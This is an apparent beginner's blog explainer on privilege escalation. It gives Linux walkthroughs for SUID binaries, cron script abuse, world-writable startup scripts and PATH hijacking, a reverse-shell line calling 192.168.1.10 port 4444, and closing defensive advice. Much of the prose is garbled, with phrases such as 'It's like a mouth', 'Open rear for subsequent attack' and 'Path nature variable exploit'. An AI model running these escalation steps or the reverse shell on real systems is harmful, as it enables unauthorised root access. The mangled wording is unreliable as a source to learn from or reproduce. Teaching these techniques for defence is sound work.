One of the most relaxed and often used bugs is a weakness in privilege. It's like a mouth, but in all honesty, the idea is straight – and it's something you really should know about if you're interested in computer security.
Prefer watching instead of reading? Here's a quick video guide
What is the privilege of increasing?
Think of a computer system as a building. Not everyone has access to all rooms. A caregiver may be able to access cleaning the wardrobe, but the CEO holds the keys to the executive office. Similarly, computer users possess different levels of access – which are also referred to as privileges.
- Normal users can access items such as browsing the web or software use.
- Administrators (or root users) can install programs, change system settings, and read sensitive files.
Privilege occurs when a user achieves more accessible than it should be. For example, if a normal user cheats the system by providing them with administrator privileges, they can now perform activities that they do not allow to perform.
Why threatens?
When an attacking gets admin privileges by exploiting a weakness, they can:
- I -Install Malware
- Steal or delete sensitive information
- Change security settings
- Open rear for subsequent attack
In essence, they can control the system completely.
Types of Privilege Increase
- Vertical Privilege Escalation: This is when an attacking up the access stairs – from a regular user to an admin. This is the most dangerous type because it provides complete control of the attacks.
- The horizontal privilege of privilege: this is when an attack remains at the same level of accessing but reaches the information or resources of other people. For example, a common user who looks at the confidential files of another user.
Typical approaches to exploitation
Suid Binaries on Linux: Suid means a program runs with the consent of the file, not the user who operates it. If not configured, it can lead to access to the root.
Check for Suid Binaries:
# Input Command
find / -perm -4000 -type f 2>/dev/null
# Output Example
-rwsr-xr-x 1 root root 133K Jan 15 2024 /usr/bin/vulnerable-bin
Exploitation of weak c binary:
// vulnerable-bin.c
#include
int main() {
system("/bin/sh"); // runs shell with root privilege
return 0;
}
If combined and granted suid root:
gcc vulnerable-bin.c -o vulnerable-bin
chmod u+s vulnerable-bin
Running it as a user:
./vulnerable-bin
# Now you’re root inside the shell!
Cron Job Abuse: Admins often schedule tasks using Chron. If it does not configure, it can run the attack code as a root.
Input Command
ls -l /etc/cron.d/customjob
Output Example
root /tmp/myscript.sh
If /TMP/myScript.Sh is written:
echo "/bin/bash" > /tmp/myscript.sh
chmod +x /tmp/myscript.sh
Now you are rooted!
Poor file permissions: Sensitive files with weak permission can be overwritten.
Input Command
ls -l /usr/local/bin/startup.sh
Output Example
-rw-rw-rw- 1 root root 124 Jan 1 00:00 /usr/local/bin/startup.sh
Now i -inject your payload
echo "bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" > /usr/local/bin/startup.sh
Path nature variable exploit: some scripts that operate system tools such as CP, LS, Cat – but do not use the whole path.
#!/bin/bash cp /etc/passwd /tmp/backup
If the CP is not given a full path (/bin/cp), the attack may deceive it.
Create fake cp
echo '#!/bin/bash' > /tmp/cp
echo 'bash' >> /tmp/cp
chmod +x /tmp/cp
Hijack path
export PATH=/tmp:$PATH
./vulnerable-script.sh
How does privilege increase?
Attacks often use one of the following:
- Software bugs exploitation: A poorly constructed program may be by accident provides excessive access to users.
- Incorrect systems: Occasionally, systems are confected so that they are at risk, such as granting unexpected permissions.
- Password weaknesses: If admin passwords are weak or stored in an unsure manner, attacks can break it.
- Insecure scripts or services: Scripts conducted with high privilege can be taken advantage of if not properly safe.
Real world
In 2021, a bug in the Linux PKEXEC (PWNkit) tool allowed local users to raise root privileges. The tool is meant to make the commands safely as another user, but since there is a bug, it is possible for anyone to take advantage of it to achieve admin rights without a password.
Avoiding the privilege of increasing
There are many steps that individuals and organizations can take:
- Implement patches and regular updates
- Apply the principle at least privilege: provide access to users only where they need it
- Audit permissions to identify over-privileged accounts
- Look at logs for anomaly behavior
- Implement security technology such as antivirus, endpoint security, and SIEM systems
Final thoughts
Privilege escalation flaws are like open doors in a strengthened building. If everything is locked, an open door can provide an attack with complete authority. This is why finding and correcting these weaknesses is to remember cybersecurity experts.
